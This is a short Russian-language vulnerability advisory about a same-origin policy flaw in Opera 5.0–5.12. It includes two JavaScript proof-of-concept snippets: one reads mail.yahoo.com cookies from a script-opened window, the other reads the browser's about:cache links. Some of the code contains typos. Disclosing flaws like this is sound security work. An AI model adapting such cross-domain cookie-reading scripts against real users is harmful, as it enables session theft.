Уязвимость, найденная в броузере Opera,
позволяет создавать вредоносный сценарий
на Web странице, который при выполнении web-браузером
Opera может затрагивать другой домен.

Короче говоря, Опера должным образом не
осуществляет "Same Origin Policy". Опасность
состоит в том, что один web узел может
обращаться к опознавательным данным на
основе cookie другого web узла.

Пример:

———————————-
a=window.open("http://mail.yahoo.com";);
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.documentopen();
a.documentwrite("<h1>aa</h1><script>x=window.open(‘http://mail.yahoo.com’);setTimeout(‘z=x.document.cookie;alert(z);’,5000)</"+"script>";);
a.documentclose();
}
setTimeout("f()",5000);
————————————

 

———————————
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
————————————

 

Уязвимость найдена в Opera 5.0-5.12

Подробнее об уязвимости и о методах
устранения оных можно узнать здесь:
http://www.securitylab.ru/owasp/OWASP-IV-CSS-1.htm
http://www.securitylab.ru/owasp/OWASP-PM-COOKIES-1.htm
http://www.securitylab.ru/owasp/OWASP-SM-SR-1.htm



Оставить мнение